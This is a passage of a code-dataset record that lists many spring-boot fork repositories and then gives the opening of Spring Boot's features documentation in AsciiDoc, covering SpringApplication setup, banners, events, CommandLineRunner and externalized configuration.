oot,Buzzardo\/spring-boot,joansmith\/spring-boot,drumonii\/spring-boot,royclarkson\/spring-boot,satheeshmb\/spring-boot,imranansari\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,SPNilsen\/spring-boot,jbovet\/spring-boot,nurkiewicz\/spring-boot,RobertNickens\/spring-boot,nebhale\/spring-boot,balajinsr\/spring-boot,jack-luj\/spring-boot,ptahchiev\/spring-boot,buobao\/spring-boot,htynkn\/spring-boot,jayeshmuralidharan\/spring-boot,prakashme\/spring-boot,rizwan18\/spring-boot,dfa1\/spring-boot,fogone\/spring-boot,ractive\/spring-boot,clarklj001\/spring-boot,jrrickard\/spring-boot,nevenc-pivotal\/spring-boot,axelfontaine\/spring-boot,huangyugui\/spring-boot,joshiste\/spring-boot,5zzang\/spring-boot,PraveenkumarShethe\/spring-boot,Charkui\/spring-boot,tan9\/spring-boot,meloncocoo\/spring-boot,zhangshuangquan\/spring-root,end-user\/spring-boot,orangesdk\/spring-boot,forestqqqq\/spring-boot,eddumelendez\/spring-boot,trecloux\/spring-boot,MasterRoots\/spring-boot,snicoll\/spring-boot,xialeizhou\/spring-boot,donhuvy\/spring-boot,kdvolder\/spring-boot,zorosteven\/spring-boot,ractive\/spring-boot,fireshort\/spring-boot,jxblum\/spring-boot,ydsakyclguozi\/spring-boot,liupugong\/spring-boot,isopov\/spring-boot,shakuzen\/spring-boot,pvorb\/spring-boot,tiarebalbi\/spring-boot,5zzang\/spring-boot,PraveenkumarShethe\/spring-boot,mebinjacob\/spring-boot,hehuabing\/spring-boot,RainPlanter\/spring-boot,mbrukman\/spring-boot,mbnshankar\/spring-boot,lcardito\/spring-boot,spring-projects\/spring-boot,damoyang\/spring-boot,joshthornhill\/spring-boot,vpavic\/spring-boot,nandakishorm\/spring-boot,cbtpro\/spring-boot,kamilszymanski\/spring-boot,cmsandiga\/spring-boot,jvz\/spring-boot,smilence1986\/spring-boot,mackeprm\/spring-boot,trecloux\/spring-boot,master-slave\/spring-boot,VitDevelop\/spring-boot,mike-kukla\/spring-boot,eric-stanley\/spring-boot,patrikbeno\/spring-boot,paddymahoney\/spring-boot,artembilan\/spring-boot,panbiping\/spring-boot,durai145\/spring-boot,linead\/spring-boot,christian-posta\/spring-boot,thomasdarimont\/spring-boot,murilobr\/spring-boot,eliudiaz\/spring-boot,fjlopez\/spring-boot,nurkiewicz\/spring-boot,sbcoba\/spring-boot,raiamber1\/spring-boot,jeremiahmarks\/spring-boot,mackeprm\/spring-boot,lokbun\/spring-boot,kayelau\/spring-boot,JiweiWong\/spring-boot,allyjunio\/spring-boot,orangesdk\/spring-boot,yunbian\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,forestqqqq\/spring-boot,fulvio-m\/spring-boot,NetoDevel\/spring-boot,orangesdk\/spring-boot,panbiping\/spring-boot,kayelau\/spring-boot,mbrukman\/spring-boot,lexandro\/spring-boot,srinivasan01\/spring-boot,jjankar\/spring-boot,rickeysu\/spring-boot,PraveenkumarShethe\/spring-boot,rizwan18\/spring-boot,habuma\/spring-boot,jorgepgjr\/spring-boot,satheeshmb\/spring-boot,RishikeshDarandale\/spring-boot,mosoft521\/spring-boot,johnktims\/spring-boot,mebinjacob\/spring-boot,nghiavo\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,prakashme\/spring-boot,VitDevelop\/spring-boot,liupd\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,dnsw83\/spring-boot,nghiavo\/spring-boot,mdeinum\/spring-boot,eric-stanley\/spring-boot,spring-projects\/spring-boot,rmoorman\/spring-boot,snicoll\/spring-boot,fjlopez\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,meloncocoo\/spring-boot,allyjunio\/spring-boot,Chomeh\/spring-boot,kiranbpatil\/spring-boot,jbovet\/spring-boot,JiweiWong\/spring-boot,izeye\/spring-boot,RobertNickens\/spring-boot,roymanish\/spring-boot,RishikeshDarandale\/spring-boot,PraveenkumarShethe\/spring-boot,pnambiarsf\/spring-boot,bjornlindstrom\/spring-boot,zorosteven\/spring-boot,akmaharshi\/jenkins,nisuhw\/spring-boot,Chomeh\/spring-boot,meloncocoo\/spring-boot,wwadge\/spring-boot,mlc0202\/spring-boot,mrumpf\/spring-boot,liupugong\/spring-boot,nebhale\/spring-boot,donthadineshkumar\/spring-boot,mlc0202\/spring-boot,raiamber1\/spring-boot,tsachev\/spring-boot,bbrouwer\/spring-boot,minmay\/spring-boot,existmaster\/spring-boot,rweisleder\/spring-boot,marcellodesales\/spring-boot,cleverjava\/jenkins2-course-spring-boot,damoyang\/spring-boot,M3lkior\/spring-boot,MrMitchellMoore\/spring-boot,marcellodesales\/spring-boot,fulvio-m\/spring-boot,RichardCSantana\/spring-boot,auvik\/spring-boot,murilobr\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,M3lkior\/spring-boot,liupd\/spring-boot,fulvio-m\/spring-boot,xialeizhou\/spring-boot,sankin\/spring-boot,RishikeshDarandale\/spring-boot,existmaster\/spring-boot,tbbost\/spring-boot,nandakishorm\/spring-boot,fireshort\/spring-boot,DeezCashews\/spring-boot,xdweleven\/spring-boot,bsodzik\/spring-boot,satheeshmb\/spring-boot,mackeprm\/spring-boot,yhj630520\/spring-boot,bijukunjummen\/spring-boot,navarrogabriela\/spring-boot,smayoorans\/spring-boot,donhuvy\/spring-boot,designreuse\/spring-boot,aahlenst\/spring-boot,xiaoleiPENG\/my-project,lcardito\/spring-boot,zhangshuangquan\/spring-root,thomasdarimont\/spring-boot,qq83387856\/spring-boot,ollie314\/spring-boot,ralenmandao\/spring-boot,ractive\/spring-boot,navarrogabriela\/spring-boot,kayelau\/spring-boot,rizwan18\/spring-boot,Xaerxess\/spring-boot,zorosteven\/spring-boot,ractive\/spring-boot,jforge\/spring-boot,buobao\/spring-boot,shakuzen\/spring-boot,yuxiaole\/spring-boot,xiaoleiPENG\/my-project,axelfontaine\/spring-boot,sungha\/spring-boot,hqrt\/jenkins2-course-spring-boot,kdvolder\/spring-boot,habuma\/spring-boot,Buzzardo\/spring-boot,jcastaldoFoodEssentials\/spring-boot,xc145214\/spring-boot,royclarkson\/spring-boot,bsodzik\/spring-boot,rizwan18\/spring-boot,neo4j-contrib\/spring-boot,yuxiaole\/spring-boot,i007422\/jenkins2-course-spring-boot,jayeshmuralidharan\/spring-boot,clarklj001\/spring-boot,mbnshankar\/spring-boot,auvik\/spring-boot,joansmith\/spring-boot,roberthafner\/spring-boot,gorcz\/spring-boot,patrikbeno\/spring-boot,MrMitchellMoore\/spring-boot,ihoneymon\/spring-boot,simonnordberg\/spring-boot,coolcao\/spring-boot,jforge\/spring-boot,Buzzardo\/spring-boot,eliudiaz\/spring-boot,vaseemahmed01\/spring-boot,sbcoba\/spring-boot,kamilszymanski\/spring-boot,durai145\/spring-boot,kdvolder\/spring-boot,10045125\/spring-boot,vaseemahmed01\/spring-boot,ilayaperumalg\/spring-boot,smayoorans\/spring-boot,designreuse\/spring-boot,buobao\/spring-boot,vakninr\/spring-boot,cbtpro\/spring-boot,jjankar\/spring-boot,smayoorans\/spring-boot,ralenmandao\/spring-boot,philwebb\/spring-boot,navarrogabriela\/spring-boot,mike-kukla\/spring-boot,master-slave\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,ydsakyclguozi\/spring-boot,jbovet\/spring-boot,bsodzik\/spring-boot,neo4j-contrib\/spring-boot,bclozel\/spring-boot,navarrogabriela\/spring-boot,yuxiaole\/spring-boot,Nowheresly\/spring-boot,tbbost\/spring-boot,eonezhang\/spring-boot,murilobr\/spring-boot,bsodzik\/spring-boot,coolcao\/spring-boot,jvz\/spring-boot,forestqqqq\/spring-boot,gorcz\/spring-boot,166yuan\/spring-boot,xiaoleiPENG\/my-project,wwadge\/spring-boot,dnsw83\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,keithsjohnson\/spring-boot,smilence1986\/spring-boot,mabernardo\/spring-boot,PraveenkumarShethe\/spring-boot,rams2588\/spring-boot,javyzheng\/spring-boot,rstirling\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,kiranbpatil\/spring-boot,lingounet\/spring-boot,sebastiankirsch\/spring-boot,mosoft521\/spring-boot,rmoorman\/spring-boot,felipeg48\/spring-boot,hehuabing\/spring-boot,lingounet\/spring-boot,nghiavo\/spring-boot,keithsjohnson\/spring-boot,qerub\/spring-boot,gauravbrills\/spring-boot,bclozel\/spring-boot,xwjxwj30abc\/spring-boot,liupugong\/spring-boot,eddumelendez\/spring-boot,thomasdarimont\/spring-boot,fogone\/spring-boot,christian-posta\/spring-boot,sbcoba\/spring-boot,SaravananParthasarathy\/SPSDemo,5zzang\/spring-boot,xdweleven\/spring-boot,ptahchiev\/spring-boot,hello2009chen\/spring-boot,nghialunhaiha\/spring-boot,neo4j-contrib\/spring-boot,ojacquemart\/spring-boot,aahlenst\/spring-boot,imranansari\/spring-boot,na-na\/spring-boot,duandf35\/spring-boot,lif123\/spring-boot,mosen11\/spring-boot,jack-luj\/spring-boot,nghialunhaiha\/spring-boot,clarklj001\/spring-boot,herau\/spring-boot,raiamber1\/spring-boot,jeremiahmarks\/spring-boot,minmay\/spring-boot,166yuan\/spring-boot,Nowheresly\/spring-boot,AngusZhu\/spring-boot,DeezCashews\/spring-boot,jmnarloch\/spring-boot,axelfontaine\/spring-boot,ractive\/spring-boot,mebinjacob\/spring-boot,ptahchiev\/spring-boot,artembilan\/spring-boot,qq83387856\/spring-boot,raiamber1\/spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,smilence1986\/spring-boot,patrikbeno\/spring-boot,okba1\/spring-boot,johnktims\/spring-boot,npcode\/spring-boot,M3lkior\/spring-boot,DeezCashews\/spring-boot,kamilszymanski\/spring-boot,mosen11\/spring-boot,eonezhang\/spring-boot,allyjunio\/spring-boot,jvz\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,rstirling\/spring-boot,lexandro\/spring-boot,ChunPIG\/spring-boot,hehuabing\/spring-boot,SaravananParthasarathy\/SPSDemo,chrylis\/spring-boot,lenicliu\/spring-boot,michael-simons\/spring-boot,lcardito\/spring-boot,mbnshankar\/spring-boot,rstirling\/spring-boot,afroje-reshma\/spring-boot-sample,lenicliu\/spring-boot,bjornlindstrom\/spring-boot,drunklite\/spring-boot,paweldolecinski\/spring-boot,donthadineshkumar\/spring-boot,simonnordberg\/spring-boot,donhuvy\/spring-boot,smayoorans\/spring-boot,trecloux\/spring-boot,joshiste\/spring-boot,auvik\/spring-boot,lcardito\/spring-boot,DONIKAN\/spring-boot,SaravananParthasarathy\/SPSDemo,mbenson\/spring-boot,mrumpf\/spring-boot,jforge\/spring-boot,dfa1\/spring-boot,prasenjit-net\/spring-boot,nghialunhaiha\/spring-boot,meloncocoo\/spring-boot,5zzang\/spring-boot,kayelau\/spring-boot,lif123\/spring-boot,Xaerxess\/spring-boot,nevenc-pivotal\/spring-boot,dreis2211\/spring-boot,roberthafner\/spring-boot,xingguang2013\/spring-boot,crackien\/spring-boot,AstaTus\/spring-boot,mabernardo\/spring-boot,DONIKAN\/spring-boot,royclarkson\/spring-boot,clarklj001\/spring-boot,Nowheresly\/spring-boot,cleverjava\/jenkins2-course-spring-boot,soul2zimate\/spring-boot,jayarampradhan\/spring-boot,sankin\/spring-boot,artembilan\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,nandakishorm\/spring-boot,huangyugui\/spring-boot,npcode\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,ydsakyclguozi\/spring-boot,tiarebalbi\/spring-boot,tbadie\/spring-boot,linead\/spring-boot,master-slave\/spring-boot,xingguang2013\/spring-boot,paweldolecinski\/spring-boot,ralenmandao\/spring-boot,mohican0607\/spring-boot,royclarkson\/spring-boot,jack-luj\/spring-boot,prakashme\/spring-boot,lif123\/spring-boot,mbenson\/spring-boot,okba1\/spring-boot,philwebb\/spring-boot-concourse,xwjxwj30abc\/spring-boot,deki\/spring-boot,DeezCashews\/spring-boot,DeezCashews\/spring-boot,yunbian\/spring-boot,philwebb\/spring-boot,RobertNickens\/spring-boot,drumonii\/spring-boot,sungha\/spring-boot,hello2009chen\/spring-boot,tsachev\/spring-boot,ameraljovic\/spring-boot,playleud\/spring-boot,roymanish\/spring-boot,joshiste\/spring-boot,lingounet\/spring-boot,okba1\/spring-boot,orangesdk\/spring-boot,hqrt\/jenkins2-course-spring-boot,drunklite\/spring-boot,frost2014\/spring-boot,yuxiaole\/spring-boot,forestqqqq\/spring-boot,joshiste\/spring-boot,linead\/spring-boot,eddumelendez\/spring-boot,raiamber1\/spring-boot,nurkiewicz\/spring-boot,aahlenst\/spring-boot,RainPlanter\/spring-boot,sbcoba\/spring-boot,patrikbeno\/spring-boot,NetoDevel\/spring-boot,hklv\/spring-boot,rmoorman\/spring-boot,drunklite\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,yhj630520\/spring-boot,srikalyan\/spring-boot,rams2588\/spring-boot,kamilszymanski\/spring-boot,SPNilsen\/spring-boot,afroje-reshma\/spring-boot-sample,srikalyan\/spring-boot,playleud\/spring-boot,mike-kukla\/spring-boot,xwjxwj30abc\/spring-boot,drumonii\/spring-boot,dnsw83\/spring-boot,ApiSecRay\/spring-boot,hehuabing\/spring-boot,jvz\/spring-boot,tbadie\/spring-boot,playleud\/spring-boot,auvik\/spring-boot,Chomeh\/spring-boot,tbadie\/spring-boot,jcastaldoFoodEssentials\/spring-boot,ollie314\/spring-boot,fogone\/spring-boot,crackien\/spring-boot,durai145\/spring-boot,eliudiaz\/spring-boot,simonnordberg\/spring-boot,olivergierke\/spring-boot,axelfontaine\/spring-boot,jack-luj\/spring-boot,tiarebalbi\/spring-boot,NetoDevel\/spring-boot,ChunPIG\/spring-boot,hqrt\/jenkins2-course-spring-boot,pvorb\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,JiweiWong\/spring-boot,Buzzardo\/spring-boot,playleud\/spring-boot,akmaharshi\/jenkins,cbtpro\/spring-boot,jorgepgjr\/spring-boot,mohican0607\/spring-boot,sungha\/spring-boot,fireshort\/spring-boot,Xaerxess\/spring-boot,vaseemahmed01\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,vandan16\/Vandan,mosen11\/spring-boot,satheeshmb\/spring-boot,wilkinsona\/spring-boot,RainPlanter\/spring-boot,roymanish\/spring-boot,nelswadycki\/spring-boot,isopov\/spring-boot,deki\/spring-boot,deki\/spring-boot,nghiavo\/spring-boot,Charkui\/spring-boot,buobao\/spring-boot,yunbian\/spring-boot,mbenson\/spring-boot,lburgazzoli\/spring-boot,pnambiarsf\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,coolcao\/spring-boot,izeye\/spring-boot,srikalyan\/spring-boot,chrylis\/spring-boot,johnktims\/spring-boot,vpavic\/spring-boot,yangdd1205\/spring-boot,JiweiWong\/spring-boot,kdvolder\/spring-boot,brettwooldridge\/spring-boot,pnambiarsf\/spring-boot,MrMitchellMoore\/spring-boot,okba1\/spring-boot,joshthornhill\/spring-boot,minmay\/spring-boot,rweisleder\/spring-boot,mabernardo\/spring-boot,lokbun\/spring-boot,peteyan\/spring-boot,dfa1\/spring-boot,lexandro\/spring-boot,5zzang\/spring-boot,xc145214\/spring-boot,bbrouwer\/spring-boot,axibase\/spring-boot,crackien\/spring-boot,isopov\/spring-boot,roberthafner\/spring-boot,vaseemahmed01\/spring-boot,ilayaperumalg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,candrews\/spring-boot,sungha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,donhuvy\/spring-boot,axibase\/spring-boot,joshthornhill\/spring-boot,ApiSecRay\/spring-boot,bijukunjummen\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,Pokbab\/spring-boot,sebastiankirsch\/spring-boot,mohican0607\/spring-boot,izestrea\/spring-boot,mbogoevici\/spring-boot,nareshmiriyala\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tsachev\/spring-boot,damoyang\/spring-boot,jrrickard\/spring-boot,christian-posta\/spring-boot,wwadge\/spring-boot,jcastaldoFoodEssentials\/spring-boot,crackien\/spring-boot,npcode\/spring-boot,MrMitchellMoore\/spring-boot,na-na\/spring-boot,artembilan\/spring-boot,yhj630520\/spring-boot,sbuettner\/spring-boot,kiranbpatil\/spring-boot,pvorb\/spring-boot,cbtpro\/spring-boot,meloncocoo\/spring-boot,johnktims\/spring-boot,xdweleven\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,eliudiaz\/spring-boot,smayoorans\/spring-boot,prasenjit-net\/spring-boot,prasenjit-net\/spring-boot,peteyan\/spring-boot,olivergierke\/spring-boot,eric-stanley\/spring-boot,javyzheng\/spring-boot,mdeinum\/spring-boot,izestrea\/spring-boot,mouadtk\/spring-boot,rmoorman\/spring-boot,eonezhang\/spring-boot,paweldolecinski\/spring-boot,meftaul\/spring-boot,hklv\/spring-boot,sbuettner\/spring-boot,izestrea\/spring-boot,jayeshmuralidharan\/spring-boot,satheeshmb\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,linead\/spring-boot,shangyi0102\/spring-boot,na-na\/spring-boot,durai145\/spring-boot,scottfrederick\/spring-boot,nevenc-pivotal\/spring-boot,donthadineshkumar\/spring-boot,bsodzik\/spring-boot,soul2zimate\/spring-boot,axibase\/spring-boot,RichardCSantana\/spring-boot,drumonii\/spring-boot,tbadie\/spring-boot,sebastiankirsch\/spring-boot,cmsandiga\/spring-boot,peteyan\/spring-boot,minmay\/spring-boot,M3lkior\/spring-boot,166yuan\/spring-boot,gregturn\/spring-boot,scottfrederick\/spring-boot,jjankar\/spring-boot,fireshort\/spring-boot,jxblum\/spring-boot,eonezhang\/spring-boot,dreis2211\/spring-boot,SaravananParthasarathy\/SPSDemo,qq83387856\/spring-boot,ojacquemart\/spring-boot,nelswadycki\/spring-boot,lcardito\/spring-boot,nebhale\/spring-boot,nebhale\/spring-boot,philwebb\/spring-boot-concourse,vandan16\/Vandan,ydsakyclguozi\/spring-boot,lburgazzoli\/spring-boot,sankin\/spring-boot,cmsandiga\/spring-boot,na-na\/spring-boot,marcellodesales\/spring-boot,xingguang2013\/spring-boot,meftaul\/spring-boot,spring-projects\/spring-boot,lokbun\/spring-boot,bijukunjummen\/spring-boot,balajinsr\/spring-boot,end-user\/spring-boot,murilobr\/spring-boot,isopov\/spring-boot,afroje-reshma\/spring-boot-sample,shangyi0102\/spring-boot,AstaTus\/spring-boot,bijukunjummen\/spring-boot,drunklite\/spring-boot,hehuabing\/spring-boot,forestqqqq\/spring-boot,srinivasan01\/spring-boot,jorgepgjr\/spring-boot,tan9\/spring-boot,brettwooldridge\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,paddymahoney\/spring-boot,ApiSecRay\/spring-boot,bclozel\/spring-boot,dnsw83\/spring-boot,xdweleven\/spring-boot,nisuhw\/spring-boot,axibase\/spring-boot,liupugong\/spring-boot,peteyan\/spring-boot,eric-stanley\/spring-boot,mosen11\/spring-boot,DONIKAN\/spring-boot,Charkui\/spring-boot,duandf35\/spring-boot,xingguang2013\/spring-boot,hklv\/spring-boot,izeye\/spring-boot,ilayaperumalg\/spring-boot,frost2014\/spring-boot,roberthafner\/spring-boot,felipeg48\/spring-boot,izestrea\/spring-boot,jcastaldoFoodEssentials\/spring-boot,kiranbpatil\/spring-boot,mbogoevici\/spring-boot,jvz\/spring-boot,xialeizhou\/spring-boot,vakninr\/spring-boot,Makhlab\/spring-boot,designreuse\/spring-boot,xiaoleiPENG\/my-project,lingounet\/spring-boot,mebinjacob\/spring-boot,xiaoleiPENG\/my-project,master-slave\/spring-boot,Pokbab\/spring-boot,ChunPIG\/spring-boot,chrylis\/spring-boot,pvorb\/spring-boot,izeye\/spring-boot,existmaster\/spring-boot,sbuettner\/spring-boot,vakninr\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,rstirling\/spring-boot,mosen11\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy\n2014-03-04 13:09:54.912 INFO 41370 --- [ main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080\n2014-03-04 13:09:56.501 INFO 41370 --- [ main] o.s.b.s.app.SampleApplication : Started SampleApplication in 2.992 seconds (JVM running for 3.658)\n----\n\nBy default `INFO` logging messages will be shown, including some relevant startup details\nsuch as the user that launched the application.\n\n\n[[boot-features-banner]]\n=== Customizing the Banner\nThe banner that is printed on start up can be changed by adding a `banner.txt` file\nto your classpath, or by setting `banner.location` to the location of such a file.\nIf the file has an unusual encoding you can set `banner.encoding` (default is UTF-8).\n\n\n[[boot-features-customizing-spring-application]]\n=== Customizing SpringApplication\nIf the `SpringApplication` defaults aren't to your taste you can instead create a local\ninstance and customize it. For example, to turn off the banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a ``fluent'' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a ``web environment'' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started you can implement the `CommandLineRunner`\ninterface. The `run(String... args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t public void run(String... args) {\n\t \/\/ Do something...\n\t }\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values, properties are considered in the the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`\n. A `RandomValuePropertySource` that only has properties in `random.*`.\n. Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*\n\timport org.springframework.beans.factory.annotation.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t @Value(\"${name}\")\n\t private String name;\n\n\t \/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `random.int*` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith ``--'', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the 